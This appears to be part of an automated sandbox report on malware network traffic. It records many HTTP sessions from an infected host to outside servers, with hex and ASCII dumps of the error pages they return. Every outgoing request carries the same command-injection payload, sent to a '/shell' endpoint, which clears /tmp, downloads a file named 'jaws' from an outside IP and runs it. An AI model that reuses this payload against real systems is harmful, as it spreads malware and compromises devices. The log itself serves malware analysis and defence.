                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            82192.168.2.234119251.222.111.20180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:23.456383944 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:23.611207962 CET713INHTTP/1.1 301 Moved Permanently
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:31:23 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 178
                                                            Connection: keep-alive
                                                            Location: https://127.0.0.1/shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws
                                                            X-Frame-Options: sameorigin
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            X-Download-Options: noopen
                                                            X-Permitted-Cross-Domain-Policies: none
                                                            Content-Security-Policy: default-src https: data: 'unsafe-inline' 'unsafe-eval'
                                                            Referrer-Policy: strict-origin
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            83192.168.2.2339076200.51.44.25480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:23.573870897 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            84192.168.2.2340348222.99.0.280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:23.586366892 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:23.869688034 CET487INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 345
                                                            Connection: close
                                                            Date: Fri, 26 Jan 2024 14:31:19 GMT
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            85192.168.2.235183023.202.233.18580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:23.700788021 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:23.827713013 CET431INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 209
                                                            Expires: Fri, 26 Jan 2024 14:31:23 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:23 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 63 36 30 64 63 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 34 38 33 26 23 34 36 3b 36 36 31 32 65 30 65 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;ec60dc17&#46;1706279483&#46;6612e0e6</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            86192.168.2.235241069.90.160.25480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:23.708076000 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:23.842798948 CET1286INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:31:23 GMT
                                                            Server: Apache
                                                            Upgrade: h2,h2c
                                                            Connection: Upgrade, close
                                                            Accept-Ranges: bytes
                                                            Vary: Accept-Encoding,User-Agent
                                                            Content-Type: text/html
                                                            Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32
                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 2
                                                            Jan 26, 2024 15:31:23.842812061 CET1286INData Raw: 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d
                                                            Data Ascii: 50%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A;
                                                            Jan 26, 2024 15:31:23.842823029 CET1286INData Raw: 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 61 6c 6c 3b 0a 20 20 20 20 20 20
                                                            Data Ascii: ght: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align: center;
                                                            Jan 26, 2024 15:31:23.842835903 CET1286INData Raw: 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65
                                                            Data Ascii: eading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0; margin:
                                                            Jan 26, 2024 15:31:23.842848063 CET1286INData Raw: 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66 44 6a 31 78 64 65 76 4e 6e 62 55 33 56 46 66 54 45 4c 2f 57 33 33
                                                            Data Ascii: 9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepj
                                                            Jan 26, 2024 15:31:23.842869043 CET1286INData Raw: 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33 59 37 70 34 38 35 45 53 41 56 6d 75 6c 64 76 7a 53 54 4b 77 32 66
                                                            Data Ascii: A8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGECjUABhPLMdT/uKL0RIQ8Dz
                                                            Jan 26, 2024 15:31:23.842881918 CET1074INData Raw: 38 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30 4f 67 7a 49 6c 72 61 52 38 76 6b 77 36 71 6e 58 6d 75 44 53 46 38 52 67 53 38 74 68 2b 64 2b 70 68 63 69 38 46 4a 66 31 66 77 61 70 69 34 34 72
                                                            Data Ascii: 8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hXRDDRzdwHZ/5D2hjjght3Mb
                                                            Jan 26, 2024 15:31:23.842905998 CET1286INData Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20
                                                            Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to hp277.hostpapa.com's <a href="mailto:admin@hostpap
                                                            Jan 26, 2024 15:31:23.842917919 CET360INData Raw: 6d 3d 63 70 6c 6f 67 6f 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61 6e 65 6c 22 20 74 69 74 6c 65 3d 22 63 50 61
                                                            Data Ascii: m=cplogo&utm_content=logolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyright">Copyright


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            87192.168.2.234232834.66.136.20080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:23.711502075 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:23.849317074 CET336INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.14.2
                                                            Date: Fri, 26 Jan 2024 14:31:23 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 169
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.2</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            88192.168.2.2338206216.152.233.16880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:23.736999989 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            89192.168.2.235669654.201.62.19080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:23.776945114 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            90192.168.2.2342280221.112.50.9280
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:23.967747927 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            91192.168.2.234937823.79.19.10380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:26.735340118 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:26.838223934 CET430INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 208
                                                            Expires: Fri, 26 Jan 2024 14:31:26 GMT
                                                            Date: Fri, 26 Jan 2024 14:31:26 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 62 61 62 64 62 31 37 26 23 34 36 3b 31 37 30 36 32 37 39 34 38 36 26 23 34 36 3b 38 66 62 35 32 33 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;1babdb17&#46;1706279486&#46;8fb5235</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            92192.168.2.2345966134.209.129.20480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:26.756021976 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            93192.168.2.2347214100.40.152.3480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:31:26.761872053 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:31:26.892627954 CET911INHTTP/1.0 404 Not Found
                                                            Server: SonicWALL
                                                            Expires: -1
                                                            Cache-Control: no-cache
                                                            Content-type: text/html;charset=UTF-8
                                                            X-Content-Type-Options: nosniff
